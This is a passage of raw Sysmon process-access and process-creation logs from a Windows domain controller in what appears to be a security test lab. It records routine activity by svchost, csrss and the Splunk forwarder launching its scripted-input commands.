EM32\ntdll.dll+51791 10341000x80000000000000002503Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002502Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002501Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8556-5FCF-7300-000000009101}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002500Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.758{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8556-5FCF-7300-000000009101}3980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002499Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.760{10ACEC4A-8556-5FCF-7300-000000009101}3980C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002498Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8556-5FCF-7200-000000009101}4008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002497Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002496Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002495Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002494Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002493Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002492Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002490Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002489Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002488Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8556-5FCF-7200-000000009101}4008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002487Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.648{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8556-5FCF-7200-000000009101}4008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002486Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.651{10ACEC4A-8556-5FCF-7200-000000009101}4008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002485Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8556-5FCF-7100-000000009101}3864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002484Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002483Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002482Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002481Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002480Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002479Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002477Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 